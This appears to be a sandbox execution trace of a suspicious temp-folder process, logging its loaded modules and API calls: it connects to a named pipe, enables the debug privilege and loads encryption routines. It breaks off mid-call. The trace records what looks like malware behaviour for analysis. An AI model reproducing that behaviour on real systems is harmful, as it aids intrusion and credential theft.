"\"C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\6B4.tmp\" \\\\.\\pipe\\{0D32AB4E-3BEE-44D4-A8CC-67331E9E7F80}" cur_dir = "C:\\Windows\\system32\\" os_username = "1R6PFH\\hJrD1KOKY DS8lUjv" os_groups = "1R6PFH\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e144" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 322 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 323 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 324 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 325 start_va = 0x770d0000 end_va = 0x77278fff entry_point = 0x770d0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 326 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 327 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 328 start_va = 0x7fffe000 end_va = 0x7fffefff entry_point = 0x0 region_type = private name = "private_0x000000007fffe000" filename = "" Region: id = 329 start_va = 0x13f060000 end_va = 0x13f072fff entry_point = 0x13f060000 region_type = mapped_file name = "6b4.tmp" filename = "\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\6B4.tmp" (normalized: "c:\\users\\hjrd1k~1\\appdata\\local\\temp\\6b4.tmp") Region: id = 330 start_va = 0x7feff3f0000 end_va = 0x7feff3f0fff entry_point = 0x7feff3f0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 331 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 332 start_va = 0x7fffffdb000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 333 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 334 start_va = 0x4a0000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 335 start_va = 0x76eb0000 end_va = 0x76fcefff entry_point = 0x76ec5ea0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 336 start_va = 0x7fefd260000 end_va = 0x7fefd2cafff entry_point = 0x7fefd2630e0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 368 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 369 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 370 start_va = 0x40000 end_va = 0xa6fff entry_point = 0x40000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 371 start_va = 0x76fd0000 end_va = 0x770c9fff entry_point = 0x76fea2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 372 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 373 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 374 start_va = 0x7fefd650000 end_va = 0x7fefd77cfff entry_point = 0x7fefd69ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 375 start_va = 0x7fefdd00000 end_va = 0x7fefdd70fff entry_point = 0x7fefdd11e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 376 start_va = 0x7fefdd90000 end_va = 0x7fefddaefff entry_point = 0x7fefdd960e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 377 start_va = 0x7fefddb0000 end_va = 0x7fefde16fff entry_point = 0x7fefddbb03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 378 start_va = 0x7fefde20000 end_va = 0x7fefdefafff entry_point = 0x7fefde40760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 379 start_va = 0x7fefdf50000 end_va = 0x7fefdfeefff entry_point = 0x7fefdf525a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 380 start_va = 0x7fefe090000 end_va = 0x7fefe158fff entry_point = 0x7fefe10a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 381 start_va = 0x7fefe230000 end_va = 0x7fefe23dfff entry_point = 0x7fefe231080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 382 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 383 start_va = 0x5a0000 end_va = 0x727fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 384 start_va = 0x760000 end_va = 0x76ffff entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 385 start_va = 0x7fefd910000 end_va = 0x7fefda18fff entry_point = 0x7fefd911064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 386 start_va = 0x7fefe160000 end_va = 0x7fefe18dfff entry_point = 0x7fefe161010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 387 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 388 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 389 start_va = 0x3b0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 390 start_va = 0x770000 end_va = 0x8f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 391 start_va = 0x900000 end_va = 0x1cfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 392 start_va = 0x7fefca80000 end_va = 0x7fefcaa1fff entry_point = 0x7fefca85d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 393 start_va = 0x7fefc550000 end_va = 0x7fefc59bfff entry_point = 0x7fefc557950 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 416 start_va = 0x1d00000 end_va = 0x1e67fff entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 462 start_va = 0x1d00000 end_va = 0x1e67fff entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 466 start_va = 0x1d00000 end_va = 0x1fcefff entry_point = 0x1d00000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 6 os_tid = 0x974 [0037.831] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x31fdb0 | out: lpSystemTimeAsFileTime=0x31fdb0*(dwLowDateTime=0xd9e03a70, dwHighDateTime=0x1d2f1b1)) [0037.831] GetCurrentProcessId () returned 0x970 [0037.831] GetCurrentThreadId () returned 0x974 [0037.831] GetTickCount () returned 0x10897 [0037.831] QueryPerformanceCounter (in: lpPerformanceCount=0x31fdb8 | out: lpPerformanceCount=0x31fdb8*=158610446) returned 1 [0037.832] GetVersion () returned 0x1db10106 [0037.833] GetCurrentThreadId () returned 0x974 [0037.833] GetStartupInfoW (in: lpStartupInfo=0x31fd10 | out: lpStartupInfo=0x31fd10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\6B4.tmp", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x13f0654ba, hStdError=0x3b12f0)) [0037.834] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0037.834] GetFileType (hFile=0x3) returned 0x2 [0037.835] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0037.835] GetFileType (hFile=0x7) returned 0x2 [0037.835] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0037.835] GetFileType (hFile=0xb) returned 0x2 [0037.836] SetHandleCount (uNumber=0x20) returned 0x20 [0037.836] GetCommandLineW () returned="\"C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\6B4.tmp\" \\\\.\\pipe\\{0D32AB4E-3BEE-44D4-A8CC-67331E9E7F80}" [0037.836] GetEnvironmentStringsW () returned 0x4ba830 [0037.838] FreeEnvironmentStringsW (penv=0x4ba830) returned 1 [0037.838] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x13f06fbd0, nSize=0x104 | out: lpFilename="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\6B4.tmp") returned 0x2c [0037.839] GetLastError () returned 0x0 [0037.840] SetLastError (dwErrCode=0x0) [0037.840] GetLastError () returned 0x0 [0037.840] SetLastError (dwErrCode=0x0) [0037.840] GetLastError () returned 0x0 [0037.840] SetLastError (dwErrCode=0x0) [0037.840] GetACP () returned 0x4e4 [0037.840] GetLastError () returned 0x0 [0037.840] SetLastError (dwErrCode=0x0) [0037.840] IsValidCodePage (CodePage=0x4e4) returned 1 [0037.840] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x31fc80 | out: lpCPInfo=0x31fc80) returned 1 [0037.840] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x31f720 | out: lpCPInfo=0x31f720) returned 1 [0037.840] GetLastError () returned 0x0 [0037.840] SetLastError (dwErrCode=0x0) [0037.840] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x31f740, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0037.840] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x31f740, cbMultiByte=256, lpWideCharStr=0x31f420, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䥍톶") returned 256 [0037.840] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䥍톶", cchSrc=256, lpCharType=0x31fa40 | out: lpCharType=0x31fa40) returned 1 [0037.840] GetLastError () returned 0x0 [0037.841] SetLastError (dwErrCode=0x0) [0037.841] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x31f740, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0037.841] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x31f740, cbMultiByte=256, lpWideCharStr=0x31f410, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0037.841] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0037.841] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x31f200, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0037.841] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x31f840, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0037.841] GetLastError () returned 0x0 [0037.841] SetLastError (dwErrCode=0x0) [0037.841] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x31f740, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0037.841] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x31f740, cbMultiByte=256, lpWideCharStr=0x31f410, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0037.841] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0037.841] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x31f200, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0037.841] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x31f940, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0037.841] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x13f065830) returned 0x0 [0037.842] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x4b8110, dwRevision=0x1 | out: pSecurityDescriptor=0x4b8110) returned 1 [0037.842] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x4b8110, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x4b8110) returned 1 [0037.842] CreateFileW (lpFileName="\\\\.\\pipe\\{0D32AB4E-3BEE-44D4-A8CC-67331E9E7F80}" (normalized: "\\device\\namedpipe\\{0d32ab4e-3bee-44d4-a8cc-67331e9e7f80}"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x31fd30, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c [0037.843] RtlGetNtVersionNumbers () returned 0x4c [0037.843] RtlAdjustPrivilege (in: Privilege=0x14, NewValue=1, ForThread=0, OldValue=0x31fda0 | out: OldValue=0x31fda0) returned 0x0 [0037.844] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.844] GetProcAddress (hModule=0x76eb0000, lpProcName="LoadLibraryW") returned 0x76ec6f80 [0037.844] LoadLibraryW (lpLibFileName="bcrypt") returned 0x7fefca80000 [0037.892] GetProcAddress (hModule=0x7fefca80000, lpProcName="BCryptOpenAlgorithmProvider") returned 0x7fefca82640 [0037.892] GetProcAddress (hModule=0x7fefca80000, lpProcName="BCryptSetProperty") returned 0x7fefca85160 [0037.892] GetProcAddress (hModule=0x7fefca80000, lpProcName="BCryptGetProperty") returned 0x7fefca81510 [0037.893] GetProcAddress (hModule=0x7fefca80000, lpProcName="BCryptGenerateSymmetricKey") returned 0x7fefca81aa0 [0037.893] GetProcAddress (hModule=0x7fefca80000, lpProcName="BCryptEncrypt") returned 0x7fefca81130 [0037.893] GetProcAddress (hModule=0x7fefca80000, lpProcName="BCryptDecrypt") returned 0x7fefca81030 [0037.893] GetProcAddress (hModule=0x7fefca80000, lpProcName="BCryptDestroyKey") returned 0x7fefca816a0 [0037.893] GetProcAddress (hModule=0x7fefca80000, lpProcName="BCryptCloseAlgorithmProvider") returned 0x7fefca832b0 [0037.893] BCryptOpenAlgorithmProvider (in: 